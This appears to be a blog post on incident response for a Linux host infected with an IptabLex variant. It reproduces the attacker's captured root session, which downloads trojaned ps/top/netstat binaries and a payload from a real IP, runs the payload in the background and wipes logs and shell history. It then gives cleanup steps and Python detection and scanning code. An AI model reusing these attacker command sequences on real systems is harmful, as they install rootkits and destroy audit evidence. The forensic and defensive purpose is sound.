Simple handling of a hacked Linux host

Source: Internet
Author: User
Tags: syslog

Below is the record of a public-facing host being hacked.

(The following records were captured through the PROMPT_COMMAND shell variable, which logs each command to syslog as it is run.)

Nov 03:24:32 * * *: [euid=root]::[/root]#
Nov 03:24:34 * * *: [euid=root]::[/root]# history
Nov 03:26:52 * * *: [euid=root]::[/root]# wget http://222.186.31.229:52636/libproc-3.2.5.so
Nov 03:26:55 * * *: [euid=root]::[/root]# wget http://222.186.31.229:52636/ps
Nov 03:26:57 * * *: [euid=root]::[/root]# wget http://222.186.31.229:52636/top
Nov 03:27:00 * * *: [euid=root]::[/root]# wget http://222.186.31.229:52636/netstat
Nov 03:27:03 * * *: [euid=root]::[/root]# chmod 777 ps
Nov 03:27:05 * * *: [euid=root]::[/root]# chmod 777 top
Nov 03:27:08 * * *: [euid=root]::[/root]# chmod 777 netstat
Nov 03:27:11 * * *: [euid=root]::[/root]# cp libproc-3.2.5.so /usr/lib64
Nov 03:27:14 * * *: [euid=root]::[/root]# rm -f /bin/ps
Nov 03:27:16 * * *: [euid=root]::[/root]# rm -f /usr/bin/top
Nov 03:27:19 * * *: [euid=root]::[/root]# rm -f /bin/netstat
Nov 03:27:21 * * *: [euid=root]::[/root]# cp top /usr/bin
Nov 03:27:24 * * *: [euid=root]::[/root]# cp ps /bin
Nov 03:27:29 * * *: [euid=root]::[/root]# cp netstat /bin
Nov 03:27:33 * * *: [euid=root]::[/root]# ps -ef
Nov 03:27:35 * * *: [euid=root]::[/root]# top
Nov 03:27:38 * * *: [euid=root]::[/root]# netstat -anp
Nov 03:27:40 * * *: [euid=root]::[/root]# netstat -an
Nov 03:27:50 * * *: [euid=root]::[/root]# wget http://222.186.31.229:52636/internet
Nov 03:27:52 * * *: [euid=root]::[/root]# chmod 0755 /root/internet
Nov 03:27:56 * * *: [euid=root]::[/root]# nohup /root/internet >/dev/null 2>&1 &
Nov 03:27:57 * *: [euid=root]::[/root]# ls
Nov 03:28:01 * *: [euid=root]::[/root]# rm -rf internet
Nov 03:28:03 * * *: [euid=root]::[/root]# rm -rf ps
Nov 03:28:05 * *: [euid=root]::[/root]# rm -rf top
Nov 03:28:08 * * *: [euid=root]::[/root]# rm -rf libproc-3.2.5.so
Nov 03:28:10 * * *: [euid=root]::[/root]# rm -rf netstat
Nov 03:28:10 * *: [euid=root]::[/root]# ls
Nov 03:28:14 * * *: [euid=root]::[/root]# rm -rf fake.cfg
Nov 03:28:15 * *: [euid=root]::[/root]# ls
Nov 03:28:21 * * *: [euid=root]::[/root]# rm -rf .bash_history
Nov 03:28:23 * * *: [euid=root]::[/root]#
Nov 03:28:24 * * *: [euid=root]::[/root]# history
Nov 03:28:30 * * *: [euid=root]::[/root]# rm -rf /root/.bash_history
Nov 03:28:30 * * *: [euid=root]::[/root]#
Nov 03:28:30 * * *: [euid=root]::[/root]# echo >/var/log/syslog
Nov 03:28:30 * * *: [euid=root]::[/root]# echo >/var/log/messages
Nov 03:28:30 * * *: [euid=root]::[/root]# echo >/var/log/httpd/access_log
Nov 03:28:30 * * *: [euid=root]::[/root]# echo >/var/log/httpd/error_log
Nov 03:28:30 * * *: [euid=root]::[/root]# echo >/var/log/xferlog
Nov 03:28:30 * * *: [euid=root]::[/root]# echo >/var/log/secure
Nov 03:28:30 * * *: [euid=root]::[/root]# echo >/var/log/auth.log
Nov 03:28:30 * * *: [euid=root]::[/root]# echo >/var/log/user.log
Nov 03:28:30 * * *: [euid=root]::[/root]# echo >/var/log/wtmp
Nov 03:28:30 * * *: [euid=root]::[/root]# echo >/var/log/lastlog
Nov 03:28:30 * * *: [euid=root]::[/root]# echo >/var/log/btmp
Nov 03:28:30 * * *: [euid=root]::[/root]# echo >/var/run/utmp
Nov 03:28:31 * * *: [euid=root]::[/root]# rm -rf /root/.bash_history
Nov 03:28:31 * * *: [euid=root]::[/root]#
Nov 03:28:31 * * *: [euid=root]::[/root]# echo >/var/log/syslog
Nov 03:28:31 * * *: [euid=root]::[/root]# echo >/var/log/messages
Nov 03:28:31 * * *: [euid=root]::[/root]# echo >/var/log/httpd/access_log
Nov 03:28:31 * * *: [euid=root]::[/root]# echo >/var/log/httpd/error_log
Nov 03:28:31 * * *: [euid=root]::[/root]# echo >/var/log/xferlog
Nov 03:28:31 * * *: [euid=root]::[/root]# echo >/var/log/secure
Nov 03:28:31 * * *: [euid=root]::[/root]# echo >/var/log/auth.log
Nov 03:28:31 * * *: [euid=root]::[/root]# echo >/var/log/user.log
Nov 03:28:31 * * *: [euid=root]::[/root]# echo >/var/log/wtmp
Nov 03:28:31 * * *: [euid=root]::[/root]# echo >/var/log/lastlog
Nov 03:28:31 * * *: [euid=root]::[/root]# echo >/var/log/btmp
Nov 03:28:31 * * *: [euid=root]::[/root]# echo >/var/run/utmp
Nov 03:28:37 * * *: [euid=root]::[/root]# rm -rf .bash_history
Nov 03:28:39 * * *: [euid=root]::[/root]#
Nov 03:28:40 * * *: [euid=root]::[/root]# history
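Because each command was shipped to syslog as it ran, the `echo >/var/log/...` truncations at the end of the session did not erase the trail above. As an added example (not part of the original post), here is a small Python detector that parses records in this PROMPT_COMMAND format and flags the behaviours visible in the session: remote download, replacement of system binaries, world-writable permissions, backgrounded execution, log truncation and history deletion. The sample records are constructed in the same format and use the documentation address 192.0.2.10 instead of the address in the real log.

```python
import re

# One PROMPT_COMMAND audit record as shown above; host/user are redacted to "* * *" in the log.
RECORD = re.compile(
    r"^(?P<ts>\w{3}(?:\s+\d{1,2})?\s+\d\d:\d\d:\d\d) (?P<src>.*?): "
    r"\[euid=(?P<euid>[^\]]+)\]::\[(?P<cwd>[^\]]*)\]#\s?(?P<cmd>.*)$"
)

# Behaviours seen in the record above; each tag is a regex over the command text.
RULES = [
    ("remote_fetch",    re.compile(r"\b(?:wget|curl)\b.*\bhttps?://", re.I)),
    ("sysbin_replace",  re.compile(r"\b(?:rm|cp|mv)\b.*\s/(?:usr/)?(?:s?bin|lib(?:64)?)\b")),
    ("world_writable",  re.compile(r"\bchmod\s+(?:0?777|a\+rwx)\b")),
    ("background_exec", re.compile(r"\bnohup\b.*>\s*/dev/null.*&\s*$")),
    ("log_wipe",        re.compile(r"(?:^|[;&|]\s*)(?:echo|:|cat\s+/dev/null)\s*>\s*/var/(?:log|run)/")),
    ("history_tamper",  re.compile(r"\.bash_history|\bhistory\s+-c\b|\bunset\s+HISTFILE\b")),
]

def parse_record(line):
    """Split one audit record into its fields; None if the line is not in this format."""
    m = RECORD.match(line.strip())
    return m.groupdict() if m else None

def classify(cmd):
    """Tags a single command triggers (empty set for benign commands such as 'ls' or 'history')."""
    return {tag for tag, rx in RULES if rx.search(cmd)}

def analyze(lines):
    """Flagged (timestamp, euid, command, tags) tuples for every suspicious command in a session."""
    flagged = []
    for line in lines:
        rec = parse_record(line)
        if rec and rec["cmd"]:                 # skip empty prompts and lines in another format
            tags = classify(rec["cmd"])
            if tags:
                flagged.append((rec["ts"], rec["euid"], rec["cmd"], tags))
    return flagged

# Constructed sample in the page's record format; 192.0.2.10 is a documentation address.
SAMPLE = """\
Nov 03:24:34 * * *: [euid=root]::[/root]# history
Nov 03:26:52 * * *: [euid=root]::[/root]# wget http://192.0.2.10:52636/libproc-3.2.5.so
Nov 03:27:11 * * *: [euid=root]::[/root]# cp libproc-3.2.5.so /usr/lib64
Nov 03:27:14 * * *: [euid=root]::[/root]# rm -f /bin/ps
Nov 03:27:56 * * *: [euid=root]::[/root]# nohup /root/internet >/dev/null 2>&1 &
Nov 03:28:30 * * *: [euid=root]::[/root]# echo >/var/log/secure
Nov 03:28:37 * * *: [euid=root]::[/root]# rm -rf .bash_history
Nov 03:28:39 * * *: [euid=root]::[/root]#
""".splitlines()
```

Run `analyze(SAMPLE)` to see six of the eight records flagged; a single session that trips several of these tags within minutes is the signature worth alerting on, rather than any one command.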


Symptoms after infection:

1. The host sends out heavy traffic, saturating the network.

2. Killing the abnormal process directly only causes a new one to be spawned.

3. Some abnormal processes have random names, and the name changes after each kill.

4. The abnormal processes use random port numbers.


The abnormal process is a variant of IptabLex, and the handling is similar:

Tracing it back to its source, there are several files:
/boot/iptables
/boot/iptablex
/boot/.IptabLes
/boot/.IptabLex

# cat /boot/iptablex
#!/bin/sh
/boot/.IptabLex
exit 0

# cat /boot/iptables
#!/bin/sh
/boot/.IptabLes
exit 0

.IptabLes and .IptabLex are probably the binaries themselves.


killall -9 scc
killall -9 .IptabLes
killall -9 .IptabLex
killall -9 profile; killall -9 profileh;
killall -9 install; killall -9 installh;
killall -9 office; killall -9 officeh;
killall -9 history
killall -9 node

rm -f /boot/*iptables
rm -f /boot/*iptablex
rm -f /boot/.IptabLes
rm -f /etc/rc.d/iptablex
rm -f /etc/rc.d/rc2.d/*iptablex
rm -f /etc/rc.d/rc2.d/*iptables
rm -f /etc/rc.d/rc3.d/*iptablex
rm -f /etc/rc.d/rc3.d/*iptables
rm -f /etc/rc.d/rc4.d/*iptablex
rm -f /etc/rc.d/rc4.d/*iptables
rm -f /etc/rc.d/rc5.d/*iptablex
rm -f /etc/rc.d/rc5.d/*iptables
rm -f /etc/rc.d/iptables
rm -f /usr/.IptabLes
rm -f /usr/.IptabLex
rm -f /etc/rc.d/init.d/iptable*


Then restore the system commands that were replaced (ps, top, netstat).

The handling above basically solves the problem.


There is a trickier case in which the malicious program spawns a batch of processes whose names resemble system commands:

pwd

ps -ef

netstat -an

Such malicious processes are not completely removed just by killing them.

You also need to remove the /lib/libgcc* library files so the malicious program cannot start again.


1. Remove the udev entry from /etc/crontab, and also remove /etc/cron.hourly/udev.sh.

2. netstat -enlp | more

Kill the processes behind the abnormal ports (sometimes TCP, sometimes UDP; the process names look like netstatps and the like), then go on to the next step.

3. rm -rf /lib/libgcc*

4. Check with netstat -anlp and netstat -enlp that no abnormal processes or open ports remain.
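After the cleanup it is worth re-checking the host for the persistence artifacts named above rather than trusting that every rm succeeded. The following is an added Python example, not from the original post: the glob list and the wrapper-script pattern come from the files shown on this page, and the crontab keyword check covers the udev entry from step 1. Paths it reports should be confirmed with rpm -qf before deletion, because the genuine iptables service script and its rc.d links match the same globs.

```python
import fnmatch, glob, os, re

# Persistence locations named in the cleanup above. The last two globs also match the
# genuine iptables service script/links, so confirm with `rpm -qf <path>` before deleting.
SUSPECT_GLOBS = [
    "/boot/iptables", "/boot/iptablex", "/boot/.IptabLes", "/boot/.IptabLex",
    "/usr/.IptabLes", "/usr/.IptabLex", "/etc/rc.d/iptables", "/etc/rc.d/iptablex",
    "/etc/cron.hourly/udev.sh",
    "/etc/rc.d/rc[2-5].d/*iptable[sx]", "/etc/rc.d/init.d/iptable*",
]
# The dropper wrappers shown above: a shebang, one hidden binary under /boot or /usr, exit 0.
WRAPPER = re.compile(r"^#!/bin/(?:ba)?sh\s*\n\s*(/(?:boot|usr)/\.\w+)\s*\n\s*exit 0\s*$")

def is_wrapper_script(text):
    """Return the hidden binary a wrapper script launches, or None for any other script."""
    m = WRAPPER.match(text)
    return m.group(1) if m else None

def crontab_hits(text, keyword="udev"):
    """Active (non-comment) crontab lines mentioning the keyword, e.g. the udev.sh entry."""
    return [ln for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#") and keyword in ln]

def match_suspect_paths(paths):
    """Keep only the absolute paths that fall under one of the suspect globs."""
    return sorted(p for p in paths if any(fnmatch.fnmatch(p, g) for g in SUSPECT_GLOBS))

def scan_host(root="/"):
    """Live check under root: returns (suspect paths, {wrapper: launched binary}, crontab lines)."""
    paths = sorted({p for g in SUSPECT_GLOBS
                    for p in glob.glob(os.path.join(root, g.lstrip("/")))})
    wrappers = {}
    for p in paths:
        try:
            with open(p, "rb") as fh:           # read only the head; binaries never match
                target = is_wrapper_script(fh.read(512).decode("utf-8", "replace"))
        except OSError:
            continue
        if target:
            wrappers[p] = target
    crontab = os.path.join(root, "etc/crontab")
    cron = crontab_hits(open(crontab).read()) if os.path.isfile(crontab) else []
    return paths, wrappers, cron

if __name__ == "__main__":
    found, wrap, cron = scan_host()
    print("suspect paths:", found or "none")
    print("wrapper scripts:", wrap or "none")
    print("crontab entries:", cron or "none")
```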

This article is from the "Cexpert" blog; please contact the author before reproducing it.
